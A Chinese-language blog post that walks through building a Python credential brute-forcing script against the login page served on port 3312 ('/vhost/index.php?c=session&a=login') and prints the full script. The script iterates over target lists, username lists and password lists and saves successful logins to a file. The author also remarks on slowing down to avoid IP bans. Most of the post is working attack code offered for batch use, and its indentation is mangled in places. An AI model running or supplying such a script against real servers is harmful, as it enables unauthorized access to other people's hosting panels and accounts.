您的位置 首页 网络安全

利用python开发一个爆破3312端口的脚本

0x01 前言 本人最近在学习利用python写脚本,所以写下这篇文章与大家共同进步。#这篇文章是由本人(Ya…

0x01 前言

本人最近在学习利用python写脚本,所以写下这篇文章与大家共同进步。
#这篇文章是由本人(YanXia)撰写,禁止转发文章

0x02 正文

本次脚本所调用的第三方库有

import requests,time

 

下面是ua头

headers = {'content-type': 'application/x-www-form-urlencoded', 
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) 
Gecko/20100101 Firefox/22.0'}

 

我们先查看源代码,获取用户名和密码所对应的值
07494-i3tskiqpxuf.png

接下来我们从俩个文本中调用username和passwd

for username in open('user.txt'): 
username = username.replace('\n', '') 
for passwd in open('pass.txt'):
 passwd = passwd.replace('\n', '') 
data = {
 'username': username, 
 'passwd': passwd, 
}

 

然后我们从文本中调用url并利用requests库发送请求

for url in open('url.txt'):
 urls = url + ':3312/vhost/index.php?c=session&a=login' 
  try:
    r = requests.post(urls, data=data, headers=headers)

 

最后加一个判断,并把正确的值保存到文本中

if '安全退出' in r.text: 
   cg = urls + "|" + username + '|' + passwd
   print(cg) file = open("bp.txt", "a+")
   file.write(cg + "\n")
   file.close()
 else:
    print('error')
 except Exception as result:
   time.sleep(0.1)

 


这样批量爆破3312端口的脚本就成功写完了(原来想写个多线程爆破,但是我发现速度太快易被banIP)。

0x03结尾

本脚本仅用于学习讨论,不用于其他任何非法操作!!!该教程所测试的网站皆为个人网站,切勿非法使用!
最后附上代码:

import requests,time
 headers = {'content-type': 'application/x-www-form-urlencoded',
 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0)
 Gecko/20100101 Firefox/22.0'}
 def baopo():
 for username in open('user.txt'):
 username = username.replace('\n', '')
 for passwd in open('pass.txt'):
 passwd = passwd.replace('\n', '')
 data = { 
   'username': username,
   'passwd': passwd, 
}
for url in open('url.txt'): 
 urls = url + ':3312/vhost/index.php?c=session&a=login'
 try:
  r = requests.post(urls, data=data, headers=headers)
  if '安全退出' in r.text:
    cg = urls + "|" + username + '|' + passwd
    print(cg)
    file = open("bp.txt", "a+")
    file.write(cg + "\n")
    file.close()
 else: 
    print('error')
 except Exception as result: 
    time.sleep(0.1)
  if __name__ == '__main__':
    print('---------------')
    print('powered by YanXia')
    print('---------------')
    baopo()

 

项目地址https://github.com/byyanxia/duanko 麻烦点个STAR谢谢

测试截图:
45194-zv37tromjl.png

本文来自网络,不代表F12sec立场,转载请注明出处:http://www.0dayhack.net/index.php/247/
YanXia

作者: YanXia

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

CAPTCHAis initialing...
联系我们

联系我们

QQ群:884338047

在线咨询: QQ交谈

邮箱: 2676666667@qq.com

工作时间:周一至周五,9:00-17:30,节假日休息

关注微信
微信扫一扫关注我们

微信扫一扫关注我们

关注微博
返回顶部